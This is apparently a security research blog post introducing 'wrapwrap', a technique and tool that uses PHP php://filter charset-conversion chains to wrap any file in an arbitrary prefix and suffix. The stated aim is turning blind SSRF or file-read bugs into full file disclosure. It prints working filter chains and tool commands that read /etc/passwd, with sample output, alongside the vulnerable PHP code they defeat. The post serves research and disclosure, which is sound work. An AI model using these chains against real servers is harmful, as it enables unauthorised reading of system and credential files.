Abstract
wrapwrap marks another improvement to the PHP filter exploitation saga. Adding arbitrary prefixes to resources using php://filter is nice, but you can now add an arbitrary suffix as well, allowing you to wrap PHP resources into any structure. This beats code like:
$data = file_get_contents($_POST['url']);
$data = json_decode($data);
echo $data->message;
or:
$config = parse_ini_file($_POST['config']);
echo $config["config_value"];
wrapwrap is available on our GitHub repository.
Introduction
A few months ago, we encountered a WordPress plugin that read an arbitrary file and parsed its XML to extract a value. The code looked like this:
# Load an arbitrary resource
$xml = file_get_contents($_POST['url']);
# Parse the XML into the $tags structure
$parser = xml_parser_create();
xml_parser_set_option($parser, XML_OPTION_CASE_FOLDING, false); # Case-sensitivity ON
xml_parse_into_struct($parser, $xml, $tags, $index);
xml_parser_free($parser);
# Extract the value of the <name> tag
foreach($tags as $tag) {
    if($tag['tag'] == 'name') {
        $product_name = $tag['value'];
        break;
    }
}
# Display product name
if(isset($product_name)) {
    echo "Product name: " . htmlentities($product_name);
}
If url pointed to a file that contained <product><name>PRODUCT123</name><price>123</price></product>, the page displayed: Product name: PRODUCT123.
By providing an HTTP URL, like http://localhost/something, we could reach an internal service, but we could not see the HTTP response, because the code would parse it as XML and only display the value of the <name> tag. This also prevented us from reading local files, or any other PHP resource. The standard workaround would have been XXE, but external entities were disabled.
We seemed to be stuck with a blind SSRF.
There was, however, an additional bug: the return value of the xml_parse_into_struct() function was not checked. Therefore, if we submitted a truncated document like <product><name>PRODUCT123, we would still get Product name: PRODUCT123, because the function fills the $tags array as it parses the XML, and does not clear it if an error happens.
This oversight was actually enough to transform the blind SSRF into an in-band (i.e. non-blind) one using PHP filters. Indeed, in 2022, @remsio released a tool that generates arbitrary file contents out of nothing, based on charset conversions.
If you are unfamiliar with the technique, we’ll briefly cover it below. Additionally, his blog post and the CTF writeup by loknop that inspired the tool are both excellent resources.
The technique works by incrementally prepending base64 digits to pre-existing content by playing with charset conversions, and then base64-decoding the result to obtain arbitrary contents. It is generally used to generate a webshell, but in our case it has another use: we can make the tool prepend the <product><name> prefix to any resource, and get the WordPress plugin to display file contents!
After a few tweaks on the original script, we had it working:
$ ./php_filter_chain_generator.py --chain '<product><name>' --file='/etc/passwd'
[+] The following gadget chain will generate the following code : <product><name> (base64 value: PHByb2R1Y3Q+PG5hbWU+)
php://filter/convert.base64-encode|...|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|...|/resource=/etc/passwd
Which gives:
php> echo file_get_contents('php://filter/convert.base64-encode|...|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|...|/resource=/etc/passwd');
<product><name>cm9vdDp4OjA6MDpyb290Oi9... # b64 of /etc/passwd
We could now load any resource and make the PHP script display it!
This, however, raised the question: what would have happened if the developer had checked the return value of the xml_parse_into_struct() function? In other words, what if we needed to provide valid XML? Or, what if the code used json_decode() instead?
Well, it turns out you can use an error-based oracle, which relies on PHP’s memory limit, to dump the file character by character. Check this CTF solution, or remsio’s tool here. This approach has downsides, however: it is slow, does not allow you to dump big files, and is very hard on the server, as each test tries to allocate huge memory regions before erroring out.
Unsatisfied with the current state of the art, we started working on a solution: a way to add, in addition to an arbitrary prefix, an arbitrary suffix to any resource. This yielded a new tool, wrapwrap, available on our GitHub.
php> echo file_get_contents('php://filter/.../resource=/etc/passwd');
<product><name>root:x:0:0:root:/root:/bin/bash=0Adaemon...</name></product>
Building wrapwrap
In this section, we’ll describe the various approaches used to find the primitives that allowed us to build the tool. For the sake of simplicity, we will refer to the contents of the resource provided to the filter chain (i.e. the value returned by the resource in php://filter/.../resource=) as the file contents, although the resource can be anything (http://, ftp://, etc.). Additionally, we’ll refer to the base64 of such file contents as the original base64.
Adding a prefix
Let’s first understand the previous state of research, that is, how you can add an arbitrary prefix to a resource using a filter chain. The idea is to work on the original base64, prepend a few digits, and then base64-decode it to obtain an arbitrary prefix followed by the original file contents.
@loknop explained it very well in his gist:
For instance, convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode will prepend a K to your B64:
php> echo file_get_contents('php://filter/convert.base64-encode/resource=/etc/passwd');
cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYm...
php> echo file_get_contents('php://filter/convert.base64-encode|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode/resource=/etc/passwd');
Kcm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYm...
Now, how do you compute a filter chain that yields a K, or any other base64 digit? @loknop (and later @remsio) used a combination of bruteforce and manual testing to do so, which apparently took days.
We’ll call a filter chain that generates a base64 digit a digit-chain. Here are a few digit-chains:
C: convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode
C: convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode
D: convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode
d: convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode
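To make the mechanics concrete, here is a minimal Python sketch of what a sequence of digit-chains achieves. It is only a model: no PHP filter is involved, each "digit + b64" step stands in for one digit-chain, and the helper name prepend_prefix is ours. It assumes a prefix whose length is a multiple of 3, so that its base64 carries no padding.

```python
import base64


def prepend_prefix(contents: bytes, prefix: bytes) -> bytes:
    """Model of the prefix technique: prepend base64 digits, then decode."""
    # Assumption: a prefix length divisible by 3 means no '=' padding.
    assert len(prefix) % 3 == 0
    b64 = base64.b64encode(contents).decode()
    # Digits are prepended one at a time, so they go in from last to first.
    for digit in reversed(base64.b64encode(prefix).decode()):
        b64 = digit + b64  # stands in for one digit-chain
    return base64.b64decode(b64)


print(prepend_prefix(b"root:x:0:0", b"<product><name>"))
```

The real chains reach the same result through charset conversions only, which is why finding each digit-chain is the hard part.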
Now that this is out of the way, let’s focus on adding a suffix to some base64.
Fuzzing to no effect
We could apply the same strategy as for the prefix, and use bruteforce to find PHP filter chains that create suffixes. However, a few hours of fuzzing and thinking showed that it would probably not work. One reason is that although some charsets add prefixes (for instance, convert.iconv.UTF8.CSISO2022KR will always prepend \x1b$)C), it wouldn’t make much sense for them to add suffixes, as strings are parsed from left to right. Playing with the = characters that pad base64 payloads proved ineffective as well.
We therefore dropped fuzzing and went back to a more analytical approach.
Not so random trimming
When playing with the primitive that allows you to add a prefix, we realized that in some cases, the original string had its last characters removed. For instance, starting from the string HELLO!, if we add the prefix HI!:
php > echo file_get_contents('php://filter/convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode|/resource=data:,HELLO!');
HI!HEL
Why would this happen? To understand it, we need a little bit of base64 theory.
Base64 stores 3 bytes over 4 B64-digits. Each digit encodes 6 bits of information. Therefore, a single digit is not enough to encode a byte. As a result, when base64-decoding 4n+1 digits, the first n quartets each decode to 3 bytes, and the last digit, which cannot encode a whole byte by itself, gets ignored:
php> echo base64_decode('SEVMTE8h');
HELLO!
php> echo base64_decode('SEVMTE8hX');
HELLO!
Now, since each digit-chain ends with convert.base64-decode|convert.base64-encode (this is a way to remove characters that are not base64 digits), if the base64 string has a size which is divisible by four, prepending a digit will also remove its last digit.
php> echo file_get_contents('php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode/resource=data:,12345678');
C1234567
This is what happens in our example: the original payload, HELLO!, has a size of 6, so its base64 is properly aligned (with a size of 8). Each time we add a base64 digit, we remove the last digit of the base64.
This behaviour turned out to be a key element of wrapwrap’s algorithm.
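The trimming can be reproduced outside PHP with a short Python sketch. Python’s own decoder rejects 4n+1 digits, so lenient_decode below is a simplified model of the lenient behaviour described above (skip non-digits, ignore a lone trailing digit), not PHP’s actual implementation; digit_chain is likewise a hypothetical stand-in for a real digit-chain.

```python
import base64
import string

B64_DIGITS = (string.ascii_letters + string.digits + "+/").encode()


def lenient_decode(data: bytes) -> bytes:
    """Simplified model of a lenient base64 decoder."""
    digits = bytes(b for b in data if b in B64_DIGITS)  # skip non-digits
    if len(digits) % 4 == 1:
        digits = digits[:-1]  # a lone trailing digit cannot form a byte
    return base64.b64decode(digits + b"=" * (-len(digits) % 4))


def digit_chain(b64: bytes, digit: bytes) -> bytes:
    """Model of one digit-chain: prepend a digit, then decode and re-encode."""
    return base64.b64encode(lenient_decode(digit + b64))


b64 = base64.b64encode(b"HELLO!")  # 8 digits, so 4-aligned
for digit in reversed(base64.b64encode(b"HI!")):
    b64 = digit_chain(b64, bytes([digit]))
print(lenient_decode(b64))
```

Under this model, the four digits of HI! push the last four digits of the original base64 out, which matches the HI!HEL output shown earlier.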
The main idea
Since we cannot generate a suffix, the other option would be to generate a prefix and make it move to the end of the original string. How can we do this?
In the error-based oracle technique, @hash_kitten cleverly uses charset conversions to swap characters around. For instance, converting from UCS-4 to UCS-4LE takes groups of 4 bytes and inverts their order (ABCD -> DCBA).
Using this idea, and with the help of the previous 4n+1 technique, we can build a prefix and have it move from the beginning of the string to its end. As an example, say that we want to set a suffix which consists of three letters (i.e. a triplet), XYZ.
First, we take some arbitrary file and convert it to base64.
Second, we pad the base64 payload such that its size is a multiple of 3 (it is not hard to bring a payload of any size to a valid size, using techniques that are not described in this article). For the sake of simplicity, we will say that the base64 is ABC.
Then, we create 3 NULL bytes in between each character by converting the payload from ASCII to UCS-4, which is a 4-byte character set.
We base64-encode the payload. Since its size is divisible by 3, the result’s size is divisible by 4.
The base64 of XYZ is WFla. Using digit-chains, we prepend a, l, F, W (in that order) to the payload. Each time we add such a digit, and because the payload is 4-aligned, the last digit gets removed.
We end up having added 4 digits at the beginning of the payload, and removed 4 at the end.
We then decode:
and finally, swap quartets using the UCS-4 to UCS-4LE conversion:
This isn’t much, but we managed to move XYZ (albeit in reverse order) after the first digit, A. If we were to base64-decode and encode the result (which removes bytes that are not base64 digits), we’d have: AZYXBC. If we keep an eye on the three NULL bytes that start on the right of A during each step of the algorithm, we can see that they are now on the right of B: they have “moved” forward 4 squares. So if we repeat the algorithm, this time with 3 NULL bytes (AAAA in base64):
The XYZ part has moved forward again, and the other base64 digits have not moved.
If we push three NULL bytes again, we get:
The XYZ triplet has moved forward 3 times, passing A, B and C, without altering the order of the other digits. By repeating this operation as many times as we need, we can push the XYZ value to the end of the payload.
We can finally simply base64-decode, then base64-encode, to get rid of NULL bytes:
And we get what we wanted: ABCZYX.
In this case, we added an XYZ triplet, followed by two triplets of NULL bytes. We could have instead pushed XYZ, then UVW, then a NULL-triplet, and we’d have a final base64 string such as: ABUVWCZYX.
Therefore, the algorithm allows us to add triplets in between each digit of the original base64.
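The rounds described in this section can be replayed with a small byte-level Python model. It makes two assumptions of ours: each digit is laid out followed by its three NULL bytes (a little-endian layout, which matches the NULL bytes sitting "on the right of A"), and the "prepend 4 digits, lose the last 4" step is applied directly to the decoded bytes instead of going through real filters. The names push, swap_quartets and strip_nulls are hypothetical.

```python
def swap_quartets(data: bytes) -> bytes:
    """Reverse every group of 4 bytes (the effect of the UCS-4 to UCS-4LE step)."""
    return b"".join(data[i:i + 4][::-1] for i in range(0, len(data), 4))


def push(payload: bytes, triplet: bytes) -> bytes:
    """One round: prepend 3 bytes, lose the last 3, then swap quartets."""
    assert len(triplet) == 3 and len(payload) % 12 == 0
    # Prepending 4 digits to the aligned base64 while losing its last 4
    # digits amounts to this operation on the decoded bytes.
    return swap_quartets(triplet + payload[:-3])


def strip_nulls(payload: bytes) -> bytes:
    """Stand-in for the final base64-decode/encode that drops NULL bytes."""
    return payload.replace(b"\x00", b"")


payload = "ABC".encode("utf-32-le")  # A, B, C each followed by 3 NULL bytes
for triplet in (b"XYZ", b"\x00\x00\x00", b"\x00\x00\x00"):
    payload = push(payload, triplet)
    print(strip_nulls(payload))
```

In this model the triplet is reversed by every swap, so it lands in reverse order after an odd number of rounds and in its original order after an even number.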
Where is the end?
Although we can now “push” a triplet to the end of the original string, we do not know the size of said string. That is, we don’t know how many times we need to repeat the algorithm before our suffix-to-be reaches the end of the string. Instead of finding a way to compute the size of the string, we chose to make use of another filter, dechunk.
This filter decodes data that uses the HTTP chunked transfer encoding. For instance:
5
Hello
7
there!
0
would become:
Hello there!
The interesting fact about this filter is that when it reaches the <LF>0<LF> sequence, which indicates the end of the chunked data, it silently discards what comes after. As a result, something like:
c
This is kept
0
This is not
is parsed as:
This is kept
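The truncation behaviour is easy to model. The Python function below is a simplified decoder written for illustration, not PHP’s dechunk implementation: it assumes well-formed, LF-terminated input and does no error handling.

```python
def dechunk(data: bytes) -> bytes:
    """Simplified chunked decoder; assumes well-formed, LF-terminated input."""
    out = bytearray()
    pos = 0
    while pos < len(data):
        eol = data.index(b"\n", pos)   # end of the chunk-size line
        size = int(data[pos:eol], 16)  # chunk sizes are hexadecimal
        if size == 0:
            break                      # final chunk: everything after is ignored
        out += data[eol + 1:eol + 1 + size]
        pos = eol + 1 + size + 1       # skip the chunk data and its trailing LF
    return bytes(out)


print(dechunk(b"c\nThis is kept\n0\nThis is not"))
```

The important property is the early exit on a zero-sized chunk: whatever follows it never reaches the output.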
So, instead of precisely computing the size of the file we are dumping, we can push a <LF>0<LF> triplet along:
Add a proper chunk header at the beginning:
Then call the dechunk filter:
And finally, base64-decode then encode to get rid of NULL bytes:
We can now trim a resource to an arbitrary size, and add a triplet in between each letter of its contents.
Real suffix control: removing digits
In the current state of affairs, we can only insert triplets of arbitrary bytes in between each base64 character. Therefore, if the original base64 is ABCDEF, we can only insert 3 bytes in between A and B, 3 between B and C, etc. We could get ABCDXXXEYYYFZZZ, but not ABCDEFXXXYYYZZZ. We don’t control more than 3 consecutive bytes.
This is annoying. Going back to our very first example, we’d like our suffix to be </name></product>, which clearly cannot be encoded via 3 base64 digits.
A bad solution would be to add a triplet, push it to the end, and then do the entire algorithm again for another triplet, and then again for another one, etc. This would work, but would be extremely costly in terms of both size (the filter chains can become huge) and time (PHP takes a few seconds to process big filter chains).
This is thus not acceptable, especially since we are already able to add several triplets in one iteration of the algorithm, only separated by one digit every time…
To see how we can solve this problem, let’s go back to theory again. In a D1D2D3D4 quartet of B64-digits, each digit Di encodes 6 bits. By decoding, we get 4×6=24 bits, thus 3 bytes B1B2B3. The last of these 3 bytes, B3, is encoded using the two least significant bits of D3 and the 6 bits of D4. As a result, if the 5th bit of D3 (its second least significant bit) is set to 1, B3 will have its most significant bit set. It will therefore be out of ASCII range, regardless of the value of D4.
Now, say we insert a triplet T1T2T3 in front of a digit X, thus forming a quartet. When this gets decoded, if we set the second to last bit of T3 to 1, we know that the last byte of the decoded value will be out of ASCII range, whatever X may be.
Therefore, if we base64-encode the original contents twice, we can then remove characters from the original base64 by making them decode to non-ASCII characters.
As an example, say a file contains HELLO!. The base64 of this is SEVMTE8h, and the base64 of that is U0VWTVRFOGg= (or U0VWTVRFOGgK if a trailing newline gets encoded along with it).
The first two quartets look like:
If we insert a triplet T1T2T3 in front of the 5th letter T, and another U1U2U3 in front of the 6th letter V, we get:
As we can see, the decoded part for the first quartet does not change (U0VW decodes to SEV), but the next quartet decodes into two bytes of our choosing (encoded with T1, T2, and the first 4 bits of T3), and a third byte which is not ASCII (because the two least significant bits of T3 are set). The information that was contained in T is “discarded”. The same happens with U1U2U3 and V.
Therefore, each triplet inserted in the second base64 allows us to encode 2 digits and get rid of 1 digit of the first base64, solving our problem. As an example, say we want to suffix SEV with ABCD. The first triplet encodes AB as QUL. The second encodes CD as Q0T.
We get: U0VWQULTQ0TV, which decodes to SEVAB�CD�. If we base64-decode and encode, we get SEVABCD.
We can now add a suffix of arbitrary size!
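The triplets of the example above can be recomputed with a few lines of Python. This is a sketch of the bit layout only; triplet_for and keep_digits are hypothetical helper names, and setting both low bits of the third digit simply mirrors the QUL and Q0T values used in the text.

```python
import base64

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def triplet_for(pair: str) -> str:
    """Three digits decoding to the two ASCII chars of pair, then a non-ASCII byte."""
    assert len(pair) == 2
    bits = (ord(pair[0]) << 8) | ord(pair[1])  # 16 bits for the two characters
    value = (bits << 2) | 0b11                 # low bits of the third digit set
    return "".join(ALPHABET[(value >> shift) & 63] for shift in (12, 6, 0))


def keep_digits(data: bytes) -> str:
    """Keep only bytes that are base64 digits, as a lenient decoder would."""
    return "".join(chr(b) for b in data if chr(b) in ALPHABET)


second_b64 = "U0VW" + triplet_for("AB") + "T" + triplet_for("CD") + "V"
decoded = base64.b64decode(second_b64)
print(second_b64, decoded, keep_digits(decoded))
```

Whatever digit follows a triplet (T and V here), the third decoded byte keeps its most significant bit set, so it is dropped when the result is treated as base64 again.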
Using wrapwrap
Say you have code like so:
$data = file_get_contents($_POST['url']);
$data = json_decode($data);
echo $data->message;
To obtain the contents of some file, we’d like to have: {"message":"<file contents>"}. This can be done using:
$ ./wrapwrap.py /etc/passwd '{"message":"' '"}' 1000
[*] Dumping 1008 bytes from /etc/passwd.
[+] Wrote filter chain to chain.txt (size=705031).
This yields:
{"message":"root:x:0:0:root:/root:/bin/bash=0Adaemon:..."}
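The =0A sequences in this output look like quoted-printable escapes for line feeds. That is our reading of the output rather than something stated above, so treat the following as a sketch under that assumption: the dumped value can be turned back into raw bytes with Python’s standard quopri module. The response string is a shortened, hypothetical sample.

```python
import json
import quopri

# Shortened sample of a response; a real one would carry the whole dump.
response = '{"message":"root:x:0:0:root:/root:/bin/bash=0Adaemon"}'

message = json.loads(response)["message"]
# Assumption: the value is quoted-printable encoded, so =0A is a line feed.
print(quopri.decodestring(message.encode()).decode())
```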
Conclusion
This is another improvement on the PHP filter attacks: we can now add a prefix and a suffix to any resource. Beware of the size of your payload, however: it gets pretty big, pretty fast. Dumping 3300 bytes from a file requires a payload of 2 megabytes. Luckily, it should not be too much of a problem if the controlled URL is sent through POST.
We deliberately left lots of details and optimisations out of the blog post to keep it concise. Don’t hesitate to read the code of wrapwrap if you want to know how it really works, and help improve it.
The GitHub repository is here.
We’re hiring!
Ambionics is an entity of Lexfo, and we’re hiring! To learn more about job opportunities, do not hesitate to contact us at [email protected]. We’re a French-speaking company, so we expect candidates to be fluent in our beautiful language.